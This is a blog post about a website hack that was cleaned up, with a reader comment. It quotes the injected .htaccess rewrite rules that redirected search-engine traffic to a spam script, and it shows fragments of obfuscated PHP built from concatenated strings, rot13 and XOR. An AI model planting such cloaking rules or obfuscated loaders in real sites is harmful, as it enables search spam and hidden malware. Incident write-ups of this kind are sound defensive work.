This site was hacked. A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings. I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.
The immediate culprit was the addition of the following lines to a number of .htaccess
files
This site was hacked. A reader of the site noted that Google’s index of this site had been co-opted by dubious pharmaceutical offerings. I’ll gladly thank that individual publicly if they give me permission to do so; but my email reply got bounced as spam.
The immediate culprit was the addition of the following lines to a number of .htaccess
files:
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR] RewriteCond %{HTTP_REFERER} (google|aol|yahoo) RewriteCond %{REQUEST_URI} /$ [OR] RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC] RewriteCond %{REQUEST_FILENAME} !common.php RewriteRule ^.*$ /common.php [L] </IfModule>
I removed those lines, as well as the common.php
file, and scanned any and all php files on my site. I saw the addition of lines such as the following:
$FYAqxDo='p'.'r'. 'eg_repl'. 'ace';... $IHxWfs=str_rot13('cert_ercynpr');... $DcNZVHCi="eW6DLAlbeAki"^"... $LYDmvYopCKSSSGcfCVNpsskU='ba'.'se64_'.'deco'.'de'...
I had old (vintage 2006) installations of PHP-openid-1.2.1 and PHP-yadis-1.0.2 that I am tentatively assuming were the ports of initial entry.
I also wiped my .ssh directory. It has a private key there that was generated for this site that presumably was legitimate, but unused by me and now presumed compromised. I never initiate sessions from this host, nor do I have any passwords saved there, so any damage caused was isolated.
I do daily backups of my site, which I keep for a week; as well as monthly backups that I basically keep forever. In addition, as I recently migrated hosts, I have a hot backup.
The PHP hacks were done after I migrated but before March 1st. The htaccess hacks were done over a week ago, but after March 1st.
Over the next few days, I’ll be looking at diffs of different snapshots of my site contents to see if there is anything else I missed.
From that article:
these attacks have almost universally been due to insecure website software running on the site in question
I have every reason to believe that this is true in my case.
To Dreamhost’s credit, I recently was the victim of another type of hack, where every PHP file on my site was prepended with a base64 encoded exploit. I was able to automatically revert the changes thanks to having installed WordPress and Mediawiki with Subversion, but I had a handful of other files (e.g. WordPress theme files) that were not under version control. I alerted Dreamhost to the attack, and they ran a script that scanned all the files in my account, cleaned the still affected files, made backups of the files they cleaned, and generated a very comprehensive email with all the details of what they did, and what I needed to do. I have to say, I was impressed. Sam, feel free to contact support an request a security scan just to be sure.
As an interesting aside, in my case, when I decoded the exploit, I could tell that the code specifically did not want to load when the page was requested by a search bot. This seems counter-intuitive, except that when Google discovers a site serving up malware for a period of time, they’ll drop you from their index, which means no more page views for our malware-friends. Which is kind of brilliant. The old hacks were all about SEO and Google Juice. The new hacks are all about money: ads and malware.